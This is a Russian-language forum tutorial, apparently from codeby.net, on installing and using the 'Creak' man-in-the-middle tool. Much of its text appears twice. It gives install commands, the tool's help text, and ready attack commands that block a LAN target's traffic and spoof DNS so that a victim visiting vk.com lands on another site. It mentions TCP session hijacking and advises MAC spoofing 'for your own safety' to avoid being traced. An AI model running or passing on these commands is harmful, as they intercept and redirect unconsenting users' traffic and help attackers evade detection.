Всем привет дорогие друзья!
Сегодня мы поговорим о скрипте Creak. Он выполняет некоторые очень известные нападения MITM атакой. И еще, заранее извиняюсь за не четкие скрины.
Некоторые из возможностей:
Имеются зависимости:
А вот с библиотекой dnet получается немного сложнее.
Немного помучавшись с зависимостями идем далее.
Если кто знает как можно проще установить libdnet, напишите в комментарии))
Если ты лентяй, то специально для тебя в конце статьи простенький bash скрипт для установки зависимостей и самого скрипта(о всех ошибках пишите в комментариях под статьей ибо скрипт для установки мой)
Посмотрим весь функционал.
Теперь перейдем непосредственно к работе.
Давайте посмотрим какой интерфейс у нас на карте(название). Те кто не помнит, это для вас
1. По умолчанию creak запрещает трафик на определенный хост. Для этого просто задаем имя целевого хоста
Также creak можно не задавать таргет опцией, тогда creak сам спросит его у вас
2. А как же без DNS спуфинга друзья?
В моем примере vk.com это тот сайт который будет посещать пользователь, codeby.net это сайт на который пользователя перенаправит при посещении сайта vk.com
(Теперь будем рекламировать кодеби подменой днс)
Также для своей безопасности можете добавить опцию " -x" которая проведет spoof mac address т.е. сменит ваш MAC.
А на этом все друзья! Изучайте и пользуйтесь))
Скрипт очень полезен, но имеются некоторые баги которые легко исправимы.
Мой утановщик можно скачать тут -
Сегодня мы поговорим о скрипте Creak. Он выполняет некоторые очень известные нападения MITM атакой. И еще, заранее извиняюсь за не четкие скрины.
Некоторые из возможностей:
- Запрещает возможность навигации и загрузки целевого хоста в локальной сети.
- DNS спуфинг
- ARP спуфинг
- Генерация нового MAC адреса для проведения атаки.
- Кража TCP сеансов по десинхронизации.
Имеются зависимости:
- Pcap библиотеки
- libdnet (dnet модуль)
- Может быть необходим scapy.
Код:
1. pip install dpkt
2. pip install pypcap
Код:
1. git clone https://github.com/dugsong/libdnet
2. ./configure && make && make install
3. cd python && python setup.py build
(установка описана в файле /libdnet/INSTALL)
Если кто знает как можно проще установить libdnet, напишите в комментарии))
Устанавливаем
Код:
1. git clone https://github.com/codepr/creak.git
2. cd creak
3. python setup.py install
4. chmod +x creak.py
Если ты лентяй, то специально для тебя в конце статьи простенький bash скрипт для установки зависимостей и самого скрипта(о всех ошибках пишите в комментариях под статьей ибо скрипт для установки мой)
Посмотрим весь функционал.
Код:
./ creak.py --help
Опции:
-h, --help показать справочное сообщение и выйти
-1, --series-scan Режим сканирования сеансов
-2, --dns-spoof Подсчет Dns
-3, -session-hijack Попробуйте украсть сеансы TCP по десинхронизации (старая техника)
-x, --spoof Spoof mode, генерирует поддельный MAC-адрес, который будет использоваться
во время атаки
-m MACADDR MAC-адрес октетного префикса (может быть полный MAC-адрес
адрес в форме AA: BB: CC: DD: EE: FF)
-M ПРОИЗВОДИТЕЛЬ Производитель беспроводного устройства для извлечения
префикс на основе производства для паролей MAC
-s SOURCE Исходный IP-адрес (например, адрес класса C, например
192.168.1.150) обычно адрес маршрутизатора
-t TARGET Целевой IP-адрес (например, адрес класса C, например
192.168.1.150), может быть указано несколько раз
-p PORT Целевой порт для выключения
-a HOST Целевой хост, который будет перенаправлен при навигации по
целевая машина
-r REDIR Перенаправление цели, которое будет выбрано вместо хоста
на целевой машине
-v, --verbose Подробный режим вывода
-d, --dotted Точечный режим вывода
-h, --help показать справочное сообщение и выйти
-1, --series-scan Режим сканирования сеансов
-2, --dns-spoof Подсчет Dns
-3, -session-hijack Попробуйте украсть сеансы TCP по десинхронизации (старая техника)
-x, --spoof Spoof mode, генерирует поддельный MAC-адрес, который будет использоваться
во время атаки
-m MACADDR MAC-адрес октетного префикса (может быть полный MAC-адрес
адрес в форме AA: BB: CC: DD: EE: FF)
-M ПРОИЗВОДИТЕЛЬ Производитель беспроводного устройства для извлечения
префикс на основе производства для паролей MAC
-s SOURCE Исходный IP-адрес (например, адрес класса C, например
192.168.1.150) обычно адрес маршрутизатора
-t TARGET Целевой IP-адрес (например, адрес класса C, например
192.168.1.150), может быть указано несколько раз
-p PORT Целевой порт для выключения
-a HOST Целевой хост, который будет перенаправлен при навигации по
целевая машина
-r REDIR Перенаправление цели, которое будет выбрано вместо хоста
на целевой машине
-v, --verbose Подробный режим вывода
-d, --dotted Точечный режим вывода
Теперь перейдем непосредственно к работе.
Давайте посмотрим какой интерфейс у нас на карте(название). Те кто не помнит, это для вас
Код:
iwconfig
1. По умолчанию creak запрещает трафик на определенный хост. Для этого просто задаем имя целевого хоста
Код:
./creak.py -t 192.168.1.2 wlan0
Также creak можно не задавать таргет опцией, тогда creak сам спросит его у вас
2. А как же без DNS спуфинга друзья?
Код:
./creak.py -t 192.168.1.2 -a vk.com -r codeby.net wlan0
(Теперь будем рекламировать кодеби подменой днс)
Также для своей безопасности можете добавить опцию " -x" которая проведет spoof mac address т.е. сменит ваш MAC.
А на этом все друзья! Изучайте и пользуйтесь))
Скрипт очень полезен, но имеются некоторые баги которые легко исправимы.
Мой утановщик можно скачать тут -